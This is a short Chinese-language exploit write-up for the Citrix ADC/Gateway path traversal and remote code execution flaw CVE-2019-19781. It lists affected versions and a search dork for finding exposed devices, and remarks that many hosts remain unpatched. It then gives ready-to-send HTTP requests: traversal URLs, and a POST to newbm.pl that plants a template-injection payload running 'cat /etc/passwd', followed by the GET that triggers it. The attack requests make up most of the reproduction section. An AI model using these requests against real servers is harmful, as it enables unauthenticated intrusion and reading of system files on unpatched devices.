Citrix路径遍历(CVE-2019-19781)

0x01 漏洞描述

Citrix旗下多款交付控制器和网关存在RCE漏洞,攻击者在无需身份验证的情况下就可执行任意命令。根据其他安全网站的说法,这个RCE漏洞会有一个标记漏洞(其中之一的标记),即本次报道的Citrx路径遍历漏洞(CVE-2019-19781)。Citrx路径遍历漏洞(CVE-2019-19781)利用方式的PoC已被公开。该漏洞利用复杂性低,且无权限要求,攻击者只能遍历vpns文件夹,但攻击者可能利用Citrx路径遍历漏洞进行RCE漏洞试探,从而发起进一步精准攻击。

0x02 影响范围

Citrix NetScaler ADC and NetScaler Gateway version 10.5

Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 

Citrix ADC and Citrix Gateway version 13.0

0x03 搜索语法

title="Citrix"

0x04 漏洞复现

该洞目录遍历被限制子在vpns文件夹下,任意用户可通过HTTP请求直接访问该目录下的文件。

https://xx.xx.xx.xx/vpn/../vpns/services.html
https://xx.xx.xx.xx/vpn/../vpns/smb.conf
如果没有修复的话的会返回 http 200

目前还是有很多没打补丁的

附上POC,建议修改文件名,文件名为:jas502n

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97

url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]

上传

请求上传的内容

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

以上代码来自jas502n,GitHub地址:https://github.com/jas502n/CVE-2019-19781